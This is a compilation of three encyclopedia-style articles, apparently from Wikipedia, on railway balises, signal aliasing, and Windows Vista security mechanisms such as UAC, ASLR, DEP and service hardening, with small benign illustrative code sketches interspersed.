A train travelling at the maximum speed of 500 km/h (310 mph) will receive a minimum of three copies of the telegram while passing over each Eurobalise. The earlier KER balises (KVB, EBICAB, RSDD) were specified to work up to 350 km/h (220 mph).[5]
The train's on-board computer uses the data from the balises to determine the safe speed profile for the line ahead. Enough information is needed to allow the train to come to a safe standstill if required.
The data in the balise can include the distance to the next balise. This is used to check for missing balises, which could otherwise lead to a potential wrong-side failure.
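The missing-balise check described above can be sketched as a simple comparison between the announced distance and the odometer. This is an illustrative toy, not any vendor's implementation; the function name, the 20 m tolerance, and the string return values are all invented for the sketch.

```python
# Illustrative sketch of a missing-balise (linking) check: each telegram
# announces the expected distance to the next balise, and the odometer
# reading is checked against it with a tolerance.

def check_linking(expected_distance_m: float,
                  travelled_since_last_m: float,
                  tolerance_m: float = 20.0) -> str:
    """Return 'ok' while within the linking window, or 'balise missed'
    once the train has clearly overrun the announced position."""
    if travelled_since_last_m <= expected_distance_m + tolerance_m:
        return "ok"
    return "balise missed"   # a real system would trigger a brake reaction

print(check_linking(1000.0, 980.0))   # ok
print(check_linking(1000.0, 1050.0))  # balise missed
```

Detecting the overrun, rather than silently continuing, is what converts a missing balise from a potential wrong-side failure into a supervised fault.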
At the start and end of ATP-equipped territory, a pair of fixed balises are often used to inform the onboard ATP equipment to start or stop supervision of the train movements.
Eurobalises are used in:
Balises other than Eurobalises are used in:
The earliest automatic train protection systems were purely mechanical, with a tripcock connected directly to the braking system. There were multiple incidents where trains had overrun a stop signal but, due to excessive speed, still crashed despite the automatic stop. Multiple systems were invented to show the speed in the driver's cab and to provide an electronic system on the train that would prevent speeding. With the advent of high-speed trains it was generally accepted that a speed indication on line-side signals is not sufficient beyond 160 km/h (99 mph), so that all such trains need cab signalling.
A combined solution to these requirements was the German LZB system, presented in 1965. The original installations were all hard-wired logic. The first real cab electronics was presented in 1972 (named LZB L72) and a cab computer was introduced by 1980 (LZB 80). The LZB system uses a wire in the middle of the tracks with loops every 100 m (330 ft), so that the position of a train is known more precisely than in any earlier system. As a result, the LZB system was used not only on high-speed tracks but also in commuter rail to increase throughput. Due to the deployment costs of the system, however, it was restricted to these application areas.
During the 1970s British Rail developed C-APT. The system utilised passive transponders (balises) placed at intervals of no more than 1 km, which transmitted the track speed (in an 80-bit packet) to a passing train for in-cab display. If the train's control system failed to receive an update within 1 km of the last transponder, the displayed speed limit was blanked and an audio tone was generated, to which the driver had to respond or the train's brakes were applied automatically. The system saw revenue service from December 1981, with the introduction of the British Rail Class 370.[6]
The development of a system using the principle of passive balises with fixed or controlled information was started in 1975 by LM Ericsson and SRT, following an incident at Tretten in Norway in 1975. The LME/SRT system became the Ebicab system. The Ebicab system established the principles of using magnetic coupling: a 27 MHz downlink from the antenna on the locomotive to energize the balises, and an uplink using 4.5 MHz to transmit information telegrams from the balises. The controlled information in the balises is encoded from statuses in the signalling system. The telegrams contain information about permitted speeds and distances. The information is used in the on-board computer to calculate brake curves, monitor speed and eventually apply brakes. In Norway, the first line equipped with Ebicab as ATP was operational in 1983. The Ebicab principles were subsequently used in the KVB and RSDD systems and also for the ERTMS ETCS balises. During the 1980s, other cab computers were introduced to read the older signalling and to overlay it with better control. The German PZ80 was able to check the speed in steps of 10 km/h (6.2 mph). The French KVB replaced the external system with balises in the early 1990s to transmit combined information for oncoming signal aspects and the allowed train speed. Siemens also invented a successor to the PZB signalling that was deployed as ZUB 121 in Switzerland from 1992 and as ZUB 123 in Denmark from 1992. ABB improved the external balises in the EBICAB 900 system, which was then adopted in Spain and Italy.
Siemens had presented a study on balise systems in 1992[7] which influenced the choice of a technology based on KVB and GSM instead of LZB when the European Rail Traffic Management System was researching a possible train signalling system for Europe. The first Eurobalises were tested in 1996 and later train protection systems used them as a basis for their signalling needs.
|
https://en.wikipedia.org/wiki/Balise
|
In signal processing and related disciplines, aliasing is a phenomenon in which a signal reconstructed from samples contains low-frequency components that are not present in the original signal. It occurs when the original signal contains components at frequencies exceeding the Nyquist frequency fs/2, where fs is the sampling frequency (undersampling). A number of distinct frequency components, called aliases, produce identical sets of samples, and typical reconstruction methods select the low-frequency component, so the reconstruction can differ from the original. The term also often refers to the distortion or artifact that results when a signal reconstructed from samples is different from the original continuous signal.
Aliasing can occur in signals sampled in time, for instance in digital audio or the stroboscopic effect, and is referred to as temporal aliasing. Aliasing in spatially sampled signals (e.g., moiré patterns in digital images) is referred to as spatial aliasing.
Aliasing is generally avoided by applying low-pass filters or anti-aliasing filters (AAF) to the input signal before sampling and when converting a signal from a higher to a lower sampling rate. Suitable reconstruction filtering should then be used when restoring the sampled signal to the continuous domain or converting a signal from a lower to a higher sampling rate. For spatial anti-aliasing, the types of anti-aliasing include fast approximate anti-aliasing (FXAA), multisample anti-aliasing, and supersampling.
When a digital image is viewed, a reconstruction is performed by a display or printer device, and by the eyes and the brain. If the image data is processed incorrectly during sampling or reconstruction, the reconstructed image will differ from the original image, and an alias is seen.
An example of spatial aliasing is the moiré pattern observed in a poorly pixelized image of a brick wall. Spatial anti-aliasing techniques avoid such poor pixelizations. Aliasing can be caused either by the sampling stage or the reconstruction stage; these may be distinguished by calling sampling aliasing prealiasing and reconstruction aliasing postaliasing.[1]
Temporal aliasing is a major concern in the sampling of video and audio signals. Music, for instance, may contain high-frequency components that are inaudible to humans. If a piece of music is sampled at 32,000 samples per second (Hz), any frequency components at or above 16,000 Hz (the Nyquist frequency for this sampling rate) will cause aliasing when the music is reproduced by a digital-to-analog converter (DAC). The high frequencies in the analog signal will appear as lower frequencies (aliases) in the recorded digital sample and, hence, cannot be reproduced correctly by the DAC. To prevent this, an anti-aliasing filter is used to remove components above the Nyquist frequency prior to sampling.
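The alias frequency of a real tone can be computed directly: fold the tone down by the nearest multiple of the sampling rate. This minimal sketch applies the folding formula |f − round(f/fs)·fs| to the 32 kHz example above; the function name is our own.

```python
# Lowest-frequency alias of a real tone at f Hz, sampled at fs Hz:
# fold by the nearest integer multiple of fs.
def alias_frequency(f: float, fs: float) -> float:
    """Return the folded (apparent) frequency in [0, fs/2]."""
    return abs(f - round(f / fs) * fs)

fs = 32_000
print(alias_frequency(12_000, fs))  # 12000.0  (below Nyquist: unchanged)
print(alias_frequency(20_000, fs))  # 12000.0  (20 kHz folds down to 12 kHz)
print(alias_frequency(33_000, fs))  # 1000.0
```

A 20 kHz component recorded at 32 kHz is thus indistinguishable from a 12 kHz tone, which is exactly what the anti-aliasing filter prevents.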
In video or cinematography, temporal aliasing results from the limited frame rate, and causes the wagon-wheel effect, whereby a spoked wheel appears to rotate too slowly or even backwards. Aliasing has changed its apparent frequency of rotation. A reversal of direction can be described as a negative frequency. Temporal aliasing frequencies in video and cinematography are determined by the frame rate of the camera, but the relative intensity of the aliased frequencies is determined by the shutter timing (exposure time) or the use of a temporal aliasing reduction filter during filming.[2]
Like the video camera, most sampling schemes are periodic; that is, they have a characteristic sampling frequency in time or in space. Digital cameras provide a certain number of samples (pixels) per degree or per radian, or samples per mm in the focal plane of the camera. Audio signals are sampled (digitized) with an analog-to-digital converter, which produces a constant number of samples per second. Some of the most dramatic and subtle examples of aliasing occur when the signal being sampled also has periodic content.
Actual signals have a finite duration and their frequency content, as defined by the Fourier transform, has no upper bound. Some amount of aliasing always occurs when such continuous functions over time are sampled. Functions whose frequency content is bounded (bandlimited) have an infinite duration in the time domain. If sampled at a high enough rate, determined by the bandwidth, the original function can, in theory, be perfectly reconstructed from the infinite set of samples.
Sometimes aliasing is used intentionally on signals with no low-frequency content, called bandpass signals. Undersampling, which creates low-frequency aliases, can produce the same result, with less effort, as frequency-shifting the signal to lower frequencies before sampling at the lower rate. Some digital channelizers exploit aliasing in this way for computational efficiency.[3] (See Sampling (signal processing), Nyquist rate (relative to sampling), and Filter bank.)
Sinusoids are an important type of periodic function, because realistic signals are often modeled as the summation of many sinusoids of different frequencies and different amplitudes (for example, with a Fourier series or transform). Understanding what aliasing does to the individual sinusoids is useful in understanding what happens to their sum.
When sampling a function at frequency fs (i.e., the sampling interval is 1/fs), the following functions of time (t) yield identical sets of samples if the sampling starts from t = 0, so that the sample instants are t = n/fs for n = 0, 1, 2, 3, and so on:
{sin(2π(f + N·fs)t + φ),  N = 0, ±1, ±2, ±3, …}.
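That this whole family really yields identical samples follows from sin(2π(f + N·fs)(n/fs) + φ) = sin(2πfn/fs + 2πNn + φ), since 2πNn is a whole number of cycles. A quick numerical check, with illustrative values f = 3 Hz, fs = 10 Hz:

```python
import math

# Samples of sin(2π·freq·t + φ) taken at t = n/fs, n = 0..7.
f, fs, phi = 3.0, 10.0, 0.4
samples = lambda freq: [math.sin(2 * math.pi * freq * n / fs + phi)
                        for n in range(8)]

base = samples(f)
for N in (1, -1, 2):          # aliases f + N·fs = 13, -7, 23 Hz
    alias = samples(f + N * fs)
    assert all(math.isclose(a, b, abs_tol=1e-9)
               for a, b in zip(base, alias))
print("samples of f, f±fs, f+2fs are indistinguishable")
```

Any of these frequencies, given only the eight samples, is an equally valid explanation of the data.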
A frequency spectrum of the samples produces equally strong responses at all those frequencies. Without collateral information, the frequency of the original function is ambiguous. So, the functions and their frequencies are said to be aliases of each other. Since sine is an odd function (sin(−x) = −sin(x)), a negative alias frequency −|f + N·fs| yields the same set of samples as +|f + N·fs| up to a phase inversion; thus, we can write all the alias frequencies as positive values: fN(f) ≜ |f + N·fs|. For example, a snapshot of the lower right frame of Fig.2 shows a component at the actual frequency f and another component at alias f−1(f). As f increases during the animation, f−1(f) decreases. The point at which they are equal (f = fs/2) is an axis of symmetry called the folding frequency, also known as the Nyquist frequency.
Aliasing matters when one attempts to reconstruct the original waveform from its samples. The most common reconstruction technique produces the smallest of thefN(f){\displaystyle f_{_{N}}(f)}frequencies. So, it is usually important thatf0(f){\displaystyle f_{0}(f)}be the unique minimum. A necessary and sufficient condition for that isfs/2>|f|,{\displaystyle f_{s}/2>|f|,}called theNyquist condition. The lower left frame of Fig.2 depicts the typical reconstruction result of the available samples. Untilf{\displaystyle f}exceeds the Nyquist frequency, the reconstruction matches the actual waveform (upper left frame). After that, it is the low frequency alias of the upper frame.
The figures below offer additional depictions of aliasing, due to sampling. A graph of amplitude vs frequency (not time) for a single sinusoid at frequency0.6fsand some of its aliases at0.4fs,1.4fs,and1.6fswould look like the 4 black dots in Fig.3. The red lines depict the paths (loci) of the 4 dots if we were to adjust the frequency and amplitude of the sinusoid along the solid red segment (betweenfs/2andfs). No matter what function we choose to change the amplitude vs frequency, the graph will exhibit symmetry between 0 andfs.Folding is often observed in practice when viewing thefrequency spectrumof real-valued samples, such as Fig.4.
Complex sinusoids are waveforms whose samples are complex numbers (z = A·e^{iθ} = A(cos θ + i·sin θ)), and the concept of negative frequency is necessary to distinguish them. In that case, the frequencies of the aliases are given by just f_N(f) = f + N·f_s. (For real sinusoids, as shown above, all alias frequencies can be written as positive values f_N(f) ≜ |f + N·f_s| because sine is an odd function.) Therefore, as f increases from 0 to f_s, f_−1(f) also increases (from −f_s to 0). Consequently, complex sinusoids do not exhibit folding.
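The two alias formulas above can be checked numerically. The sketch below is illustrative only (the function names are ours): it enumerates alias frequencies over a few values of N and shows that a real 60 Hz sinusoid sampled at 100 Hz, which violates the Nyquist condition f_s/2 > |f|, has 40 Hz as its smallest alias, while a 20 Hz sinusoid's smallest alias is its own frequency.

```python
def real_aliases(f, fs, n_range=range(-2, 3)):
    """Alias frequencies of a real sinusoid: f_N(f) = |f + N*fs| (folding)."""
    return sorted(abs(f + n * fs) for n in n_range)

def complex_aliases(f, fs, n_range=range(-2, 3)):
    """Alias frequencies of a complex sinusoid: f_N(f) = f + N*fs (no folding)."""
    return sorted(f + n * fs for n in n_range)

fs = 100.0
print(real_aliases(60.0, fs))   # smallest alias is |60 - 100| = 40, not 60
print(real_aliases(20.0, fs))   # Nyquist met: smallest alias is 20 itself
print(complex_aliases(60.0, fs))
```

A reconstruction that always picks the smallest alias would therefore render the 60 Hz tone at 40 Hz, which is exactly the ambiguity the Nyquist condition rules out.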
When the condition f_s/2 > f is met for the highest frequency component of the original signal, then it is met for all the frequency components, a condition called the Nyquist criterion. That is typically approximated by filtering the original signal to attenuate high-frequency components before it is sampled. These attenuated high-frequency components still generate low-frequency aliases, but typically at low enough amplitudes that they do not cause problems. A filter chosen in anticipation of a certain sample frequency is called an anti-aliasing filter.
The filtered signal can subsequently be reconstructed, by interpolation algorithms, without significant additional distortion. Most sampled signals are not simply stored and reconstructed, but the fidelity of a theoretical reconstruction (via the Whittaker–Shannon interpolation formula) is a customary measure of the effectiveness of sampling.
Historically, the term aliasing evolved from radio engineering because of the action of superheterodyne receivers. When the receiver shifts multiple signals down to lower frequencies, from RF to IF by heterodyning, an unwanted signal from an RF frequency equally far from the local oscillator (LO) frequency as the desired signal, but on the wrong side of the LO, can end up at the same IF frequency as the wanted one. If it is strong enough it can interfere with reception of the desired signal. This unwanted signal is known as an image or alias of the desired signal.
The first written use of the terms "alias" and "aliasing" in signal processing appears to be in a 1949 unpublished Bell Laboratories technical memorandum[4] by John Tukey and Richard Hamming. That paper includes an example of frequency aliasing dating back to 1922. The first published use of the term "aliasing" in this context is due to Blackman and Tukey in 1958.[5] In their preface to the Dover reprint[6] of this paper, they point out that the idea of aliasing had been illustrated graphically by Stumpf[7] ten years prior.
The 1949 Bell technical report refers to aliasing as though it is a well-known concept, but does not offer a source for the term. Gwilym Jenkins and Maurice Priestley credit Tukey with introducing it in this context,[8] though an analogous concept of aliasing had been introduced a few years earlier[9] in fractional factorial designs. While Tukey did significant work in factorial experiments[10] and was certainly aware of aliasing in fractional designs,[11] it cannot be determined whether his use of "aliasing" in signal processing was consciously inspired by such designs.
Aliasing occurs whenever the use of discrete elements to capture or produce a continuous signal causes frequency ambiguity.
Spatial aliasing, particularly of angular frequency, can occur when reproducing a light field or sound field with discrete elements, as in 3D displays or wave field synthesis of sound.[12]
This aliasing is visible in images such as posters with lenticular printing: if they have low angular resolution, then as one moves past them, say from left to right, the 2D image does not initially change (so it appears to move left); then, as one moves to the next angular image, the image suddenly changes (so it jumps right). The frequency and amplitude of this side-to-side movement correspond to the angular resolution of the image (and, for frequency, the speed of the viewer's lateral movement), which is the angular aliasing of the 4D light field.
The lack of parallax on viewer movement in 2D images and in 3-D film produced by stereoscopic glasses (in 3D films the effect is called "yawing", as the image appears to rotate on its axis) can similarly be seen as loss of angular resolution, all angular frequencies being aliased to 0 (constant).
The qualitative effects of aliasing can be heard in the following audio demonstration. Six sawtooth waves are played in succession, with the first two sawtooths having a fundamental frequency of 440 Hz (A4), the second two having a fundamental frequency of 880 Hz (A5), and the final two at 1760 Hz (A6). The sawtooths alternate between bandlimited (non-aliased) sawtooths and aliased sawtooths, and the sampling rate is 22050 Hz. The bandlimited sawtooths are synthesized from the sawtooth waveform's Fourier series such that no harmonics above the Nyquist frequency (11025 Hz = 22050 Hz / 2 here) are present.
The aliasing distortion in the lower frequencies is increasingly obvious with higher fundamental frequencies, and while the bandlimited sawtooth is still clear at 1760 Hz, the aliased sawtooth is degraded and harsh with a buzzing audible at frequencies lower than the fundamental.
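The two kinds of sawtooth described above can be sketched as follows. This is an illustrative reconstruction, not the code used for the audio demonstration, and the function names are ours: the bandlimited version sums only the Fourier-series harmonics of the sawtooth that fall below the Nyquist frequency, while the naive version samples the ideal ramp directly, folding every harmonic above f_s/2 back into the audible band.

```python
import math

def bandlimited_sawtooth(f0, fs, n_samples):
    """Additive synthesis: sum sine harmonics of f0 up to the Nyquist
    frequency fs/2, using the sawtooth Fourier series
    saw(t) = (2/pi) * sum_{k>=1} (-1)^(k+1) * sin(2*pi*k*f0*t) / k."""
    n_harm = int((fs / 2) // f0)  # highest harmonic below Nyquist
    out = []
    for n in range(n_samples):
        t = n / fs
        s = sum((-1) ** (k + 1) * math.sin(2 * math.pi * k * f0 * t) / k
                for k in range(1, n_harm + 1))
        out.append(2 / math.pi * s)
    return out

def naive_sawtooth(f0, fs, n_samples):
    """Trivial (aliased) sawtooth: sampling the ideal ramp directly."""
    return [2 * ((n * f0 / fs) % 1.0) - 1.0 for n in range(n_samples)]

wave = bandlimited_sawtooth(1760.0, 22050.0, 64)
```

With f0 = 1760 Hz and f_s = 22050 Hz, only harmonics 1 through 6 fit below 11025 Hz, which is why the bandlimited A6 sawtooth sounds noticeably duller yet free of the buzzing aliases.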
A form of spatial aliasing can also occur in antenna arrays or microphone arrays used to estimate the direction of arrival of a wave signal, as in geophysical exploration by seismic waves. Waves must be sampled more densely than two points per wavelength, or the wave arrival direction becomes ambiguous.[13]
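This direction-of-arrival ambiguity can be illustrated for a uniform linear array (a hypothetical sketch; the function name and parameter choices are ours). Sensors spaced d apart measure an inter-element phase proportional to sin(θ)·d/λ, so two directions alias whenever their sines differ by a multiple of λ/d; once the spacing exceeds half a wavelength, spurious arrival directions appear.

```python
import math

def ambiguous_angles(theta_deg, d, lam):
    """Arrival angles (degrees) producing the same inter-sensor phase as
    theta_deg for a uniform linear array with element spacing d.
    Angles alias when sin(theta') = sin(theta) + m * lam / d, m integer."""
    s0 = math.sin(math.radians(theta_deg))
    angles = []
    for m in range(-5, 6):
        s = s0 + m * lam / d
        if -1.0 <= s <= 1.0:
            angles.append(round(math.degrees(math.asin(s)), 3))
    return sorted(angles)

# d = lam/2 (two points per wavelength): only the true angle survives
print(ambiguous_angles(20.0, 0.5, 1.0))
# d = lam (undersampled): a second, spurious arrival angle appears
print(ambiguous_angles(20.0, 1.0, 1.0))
```

At half-wavelength spacing λ/d = 2, so no integer shift of sin(θ) other than m = 0 stays within [−1, 1], and the direction estimate is unique.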
https://en.wikipedia.org/wiki/Aliasing
There are a number of security and safety features new to Windows Vista, most of which are not available in any prior Microsoft Windows operating system release.
Beginning in early 2002 with Microsoft's announcement of its Trustworthy Computing initiative, a great deal of work has gone into making Windows Vista a more secure operating system than its predecessors. Internally, Microsoft adopted a "Security Development Lifecycle"[1] with the underlying ethos of "Secure by design, secure by default, secure in deployment". New code for Windows Vista was developed with the SDL methodology, and all existing code was reviewed and refactored to improve security.
Some specific areas where Windows Vista introduces new security and safety mechanisms include User Account Control, parental controls, Network Access Protection, a built-in anti-malware tool, and new digital content protection mechanisms.
User Account Control is a new infrastructure that requires user consent before allowing any action that requires administrative privileges. With this feature, all users, including users with administrative privileges, run in a standard user mode by default, since most applications do not require higher privileges. When some action is attempted that needs administrative privileges, such as installing new software or changing system or security settings, Windows will prompt the user whether to allow the action or not. If the user chooses to allow, the process initiating the action is elevated to a higher privilege context to continue. While standard users need to enter a username and password of an administrative account to get a process elevated (over-the-shoulder credentials), an administrator can choose to be prompted just for consent or asked for credentials. If the user does not respond within 30 seconds, the prompt is denied.
UAC asks for credentials in a Secure Desktop mode, where the entire screen is faded out and temporarily disabled, to present only the elevation UI. This is to prevent spoofing of the UI or the mouse by the application requesting elevation. If the application requesting elevation does not have focus before the switch to Secure Desktop occurs, then its taskbar icon blinks, and when focused, the elevation UI is presented (however, it is not possible to prevent a malicious application from silently obtaining the focus).
Since the Secure Desktop allows only highest-privilege System applications to run, no user-mode application can present its dialog boxes on that desktop, so any prompt for elevation consent can be safely assumed to be genuine. Additionally, this can also help protect against shatter attacks, which intercept Windows inter-process messages to run malicious code or spoof the user interface, by preventing unauthorized processes from sending messages to high-privilege processes. Any process that wants to send a message to a high-privilege process must get itself elevated to the higher privilege context, via UAC.
Applications written with the assumption that the user will be running with administrator privileges experienced problems in earlier versions of Windows when run from limited user accounts, often because they attempted to write to machine-wide or system directories (such as Program Files) or registry keys (notably HKLM).[2] UAC attempts to alleviate this using File and Registry Virtualization, which redirects writes (and subsequent reads) to a per-user location within the user's profile. For example, if an application attempts to write to "C:\Program Files\appname\settings.ini" and the user doesn't have permissions to write to that directory, the write will get redirected to "C:\Users\username\AppData\Local\VirtualStore\Program Files\appname\".
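The redirection just described can be sketched as a simple path mapping. This is illustrative only — it is not how Windows implements virtualization, and the helper name is ours; the example paths mirror the ones given above.

```python
# Illustrative sketch of UAC File Virtualization's path redirection:
# a denied write under a protected root is shadowed into the per-user
# VirtualStore, and subsequent reads check the shadow copy first.
PROTECTED_ROOT = r"C:\Program Files"
VIRTUAL_STORE = r"C:\Users\username\AppData\Local\VirtualStore"

def virtualized_path(path):
    """Map a path under the protected root to its VirtualStore shadow."""
    if path.lower().startswith(PROTECTED_ROOT.lower()):
        rel = path[len(PROTECTED_ROOT):].lstrip("\\")
        return VIRTUAL_STORE + "\\Program Files\\" + rel
    return path  # unprotected locations are written in place

print(virtualized_path(r"C:\Program Files\appname\settings.ini"))
```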
BitLocker, formerly known as "Secure Startup", offers full disk encryption for the system volume. Using the command-line utility, it is possible to encrypt additional volumes. BitLocker utilizes a USB key or a Trusted Platform Module (TPM) conforming to version 1.2 of the TCG specifications to store its encryption key. It ensures that the computer running Windows Vista starts in a known-good state, and it also protects data from unauthorized access.[3] Data on the volume is encrypted with a Full Volume Encryption Key (FVEK), which is in turn encrypted with a Volume Master Key (VMK) and stored on the disk itself.
Windows Vista is the first Microsoft Windows operating system to offer native support for TPM 1.2 by providing a set of APIs, commands, classes, and services for the use and management of the TPM.[4][5] A new system service, referred to as TPM Base Services, enables the access to and sharing of TPM resources for developers who wish to build applications with support for the device.[6]
Encrypting File System (EFS) in Windows Vista can be used to encrypt the system page file and the per-user Offline Files cache. EFS is also more tightly integrated with enterprise Public Key Infrastructure (PKI), and supports using PKI-based key recovery, data recovery through EFS recovery certificates, or a combination of the two. There are also new Group Policies to require smart cards for EFS, enforce page file encryption, stipulate minimum key lengths for EFS, enforce encryption of the user's Documents folder, and prohibit self-signed certificates. The EFS encryption key cache can be cleared when a user locks their workstation or after a certain time limit.
The EFS rekeying wizard allows the user to choose a certificate for EFS and to select and migrate existing files that will use the newly chosen certificate. Certificate Manager also allows users to export their EFS recovery certificates and private keys. Users are reminded to back up their EFS keys upon first use through a balloon notification. The rekeying wizard can also be used to migrate users in existing installations from software certificates to smart cards. The wizard can also be used by an administrator or users themselves in recovery situations. This method is more efficient than decrypting and re-encrypting files.
Windows Vista significantly improves the firewall[7] to address a number of concerns around the flexibility of Windows Firewall in a corporate environment.
Windows Vista includes Windows Defender, Microsoft's anti-spyware utility. According to Microsoft, it was renamed from "Microsoft AntiSpyware" because it not only features scanning of the system for spyware, similar to other free products on the market, but also includes Real Time Security agents that monitor several common areas of Windows for changes which may be caused by spyware. These areas include Internet Explorer configuration and downloads, auto-start applications, system configuration settings, and add-ons to Windows such as Windows Shell extensions.
Windows Defender also includes the ability to remove installed ActiveX applications and block startup programs. It also incorporates the SpyNet network, which allows users to communicate with Microsoft, report what they consider to be spyware, and check which applications are acceptable.
Windows Vista allows administrators to enforce hardware restrictions via Group Policy to prevent users from installing devices, to restrict device installation to a predefined whitelist, or to restrict access to removable media and classes of devices.[8][9]
Windows Vista includes a range of parental controls for administrators to monitor and restrict computer activity of standard user accounts that are not part of a domain; User Account Control enforces administrative restrictions. Features include: the Windows Vista Web Filter, implemented as a Winsock LSP filter to function across all Web browsers, which prohibits access to websites based on categories of content or specific addresses (with an option to block all file downloads); Time Limits, which prevents standard users from logging in during a date or time specified by an administrator (and which locks restricted accounts that are already logged in during such times); Game Restrictions, which allows administrators to block games based on names, contents, or ratings defined by a video game content rating system such as the Entertainment Software Rating Board (ESRB), with content restrictions taking precedence over rating restrictions (e.g., Everyone 10+ (E10+) games may be permitted to run in general, but E10+ games with mild language will still be blocked if mild language itself is blocked); Application Restrictions, which uses application whitelists for specific applications; and Activity Reports, which monitors and records activities of restricted standard user accounts.
Windows Parental Controls includes an extensible set of options, with application programming interfaces (APIs) for developers to replace bundled features with their own.
Windows Vista uses Address Space Layout Randomization (ASLR) to load system files at random addresses in memory.[10] By default, all system files are loaded randomly at any of 256 possible locations. Other executables have to specifically set a bit in the header of the Portable Executable (PE) file, the file format for Windows executables, to use ASLR. For such executables, the locations of the allocated stack and heap are also randomly chosen. By loading system files at random addresses, it becomes harder for malicious code to know where privileged system functions are located, making it unlikely that exploits can use them predictably. This helps prevent most remote-execution attacks by thwarting return-to-libc buffer overflow attacks.
The Portable Executable format has been updated to support embedding of the exception handler address in the header. Whenever an exception is thrown, the address of the handler is verified against the one stored in the executable header. If they match, the exception is handled; otherwise, the run-time stack has been compromised, and the process is terminated.
Function pointers are obfuscated by XOR-ing them with a random number, so that the actual address pointed to is hard to retrieve. Manually changing a pointer is similarly difficult, as the obfuscation key used for the pointer would be very hard to retrieve; thus, an unauthorized user of the function pointer cannot actually use it. Metadata for heap blocks are also XOR-ed with random numbers. In addition, checksums for heap blocks are maintained and used to detect unauthorized changes and heap corruption. Whenever heap corruption is detected, the application is killed to prevent successful completion of the exploit.
Windows Vista binaries include intrinsic support for detection of stack overflows. When a stack overflow in a Windows Vista binary is detected, the process is killed so that it cannot be used to carry on the exploit. Windows Vista binaries also place buffers higher in memory and non-buffer data, such as pointers and supplied parameters, in lower memory areas, so an actual exploit requires a buffer underrun to reach those locations. However, buffer underruns are much less common than buffer overruns.
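The XOR obfuscation can be illustrated with a toy sketch. It is conceptually similar to the Win32 EncodePointer/DecodePointer APIs, but the code below is ours and operates on plain integers rather than real pointers.

```python
import secrets

# Conceptual sketch of pointer encoding: XOR a pointer value with a
# secret per-process key, so a leaked encoded value does not reveal the
# real address, and an attacker who overwrites it without knowing the
# key ends up with a garbage pointer.
KEY = secrets.randbits(64)  # per-process random cookie

def encode_pointer(addr):
    return addr ^ KEY

def decode_pointer(encoded):
    return encoded ^ KEY  # XOR is its own inverse

real_addr = 0x7FFE00001234
enc = encode_pointer(real_addr)
assert decode_pointer(enc) == real_addr
# Tampering with the encoded value without knowing KEY decodes to junk:
tampered = enc ^ 0xFF
assert decode_pointer(tampered) != real_addr
```

The same XOR-with-secret idea underlies the heap-metadata obfuscation mentioned above: without the per-process key, an attacker cannot construct a valid encoded value.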
Windows Vista introduces Mandatory Integrity Control to set integrity levels for processes. A low-integrity process cannot access the resources of a higher-integrity process. This feature is used to enforce application isolation: applications at a medium integrity level, such as all applications running in the standard user context, cannot hook into system-level processes running at high integrity level, such as administrator-mode applications, but can hook onto lower-integrity processes such as Internet Explorer 7 or 8. A lower-privilege process cannot perform a window handle validation of a higher-privilege process, cannot use SendMessage or PostMessage to reach higher-privilege application windows, cannot use thread hooks to attach to a higher-privilege process, cannot use journal hooks to monitor a higher-privilege process, and cannot perform DLL injection into a higher-privilege process.
Windows Vista offers full support for the NX (No-Execute) feature of modern processors.[11] Data Execution Prevention (DEP) was introduced in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1. This feature, present as NX (EVP) in AMD's AMD64 processors and as XD (EDB) in Intel's processors, can flag certain parts of memory as containing data instead of executable code, which prevents overflow errors from resulting in arbitrary code execution.
If the processor supports the NX-bit, Windows Vista automatically enforces hardware-basedData Execution Preventionon all processes to mark some memory pages as non-executable data segments (like the heap and stack), and subsequently any data is prevented from being interpreted and executed as code. This prevents exploit code from being injected as data and then executed.
If DEP is enabled for all applications, users gain additional resistance against zero-day exploits. But not all applications are DEP-compliant, and some will generate DEP exceptions. Therefore, DEP is not enforced for all applications by default in 32-bit versions of Windows and is only turned on for critical system components. However, Windows Vista introduces additional NX policy controls that allow software developers to enable NX hardware protection for their code, independent of system-wide compatibility enforcement settings. Developers can mark their applications as NX-compliant when built, which allows protection to be enforced when that application is installed and runs. This enables a higher percentage of NX-protected code in the software ecosystem on 32-bit platforms, where the default system compatibility policy for NX is configured to protect only operating system components. For x86-64 applications, backward compatibility is not an issue, and therefore DEP is enforced by default for all 64-bit programs. Also, only processor-enforced DEP is used in x86-64 versions of Windows Vista for greater security.
New digital rights management and content-protection features have been introduced in Windows Vista to help digital content providers and corporations protect their data from being copied.
The inclusion of new digital rights management features has been a source of criticism of Windows Vista.
Windows Service Hardening compartmentalizes the services such that if one service is compromised, it cannot easily attack other services on the system. It prevents Windows services from performing operations on file systems, the registry, or networks[14] which they are not supposed to, thereby reducing the overall attack surface on the system and preventing entry of malware by exploiting system services. Services are now assigned a per-service Security Identifier (SID), which allows controlling access to the service as per the access specified by the security identifier. A per-service SID may be assigned during service installation via the ChangeServiceConfig2 API or by using the SC.EXE command with the sidtype verb. Services can also use access control lists (ACLs) to prevent external access to resources private to themselves.
Services in Windows Vista also run in a less privileged account such as Local Service or Network Service, instead of the System account. Previous versions of Windows ran system services in the same login session as the locally logged-in user (Session 0). In Windows Vista, Session 0 is now reserved for these services, and all interactive logins are done in other sessions.[15] This is intended to help mitigate a class of exploits of the Windows message-passing system known as shatter attacks. The process hosting a service has only the privileges specified in the RequiredPrivileges registry value under HKLM\System\CurrentControlSet\Services.
Services also need explicit write permissions to write to resources, on a per-service basis. By using a write-restricted access token, only those resources which have to be modified by a service are given write access, so trying to modify any other resource fails. Services also have a pre-configured firewall policy, which gives each service only as much privilege as is needed for it to function properly. Independent software vendors can also use Windows Service Hardening to harden their own services. Windows Vista also hardens the named pipes used by RPC servers to prevent other processes from being able to hijack them.
Graphical Identification and Authentication (GINA), used for secure authentication and interactive logon, has been replaced by Credential Providers. Combined with supporting hardware, Credential Providers can extend the operating system to enable users to log on through biometric devices (fingerprint, retinal, or voice recognition), passwords, PINs, and smart card certificates, or any custom authentication package and schema third-party developers wish to create. Smart card authentication is flexible, as certificate requirements are relaxed. Enterprises may develop, deploy, and optionally enforce custom authentication mechanisms for all domain users. Credential Providers may be designed to support single sign-on (SSO), authenticating users to a secure network access point (leveraging RADIUS and other technologies) as well as machine logon. Credential Providers are also designed to support application-specific credential gathering, and may be used for authentication to network resources, joining machines to a domain, or to provide administrator consent for User Account Control. Authentication is also supported using IPv6 or Web services. A new security service provider, CredSSP, is available through the Security Support Provider Interface; it enables an application to delegate the user's credentials from the client (by using the client-side SSP) to the target server (through the server-side SSP). CredSSP is also used by Terminal Services to provide single sign-on.
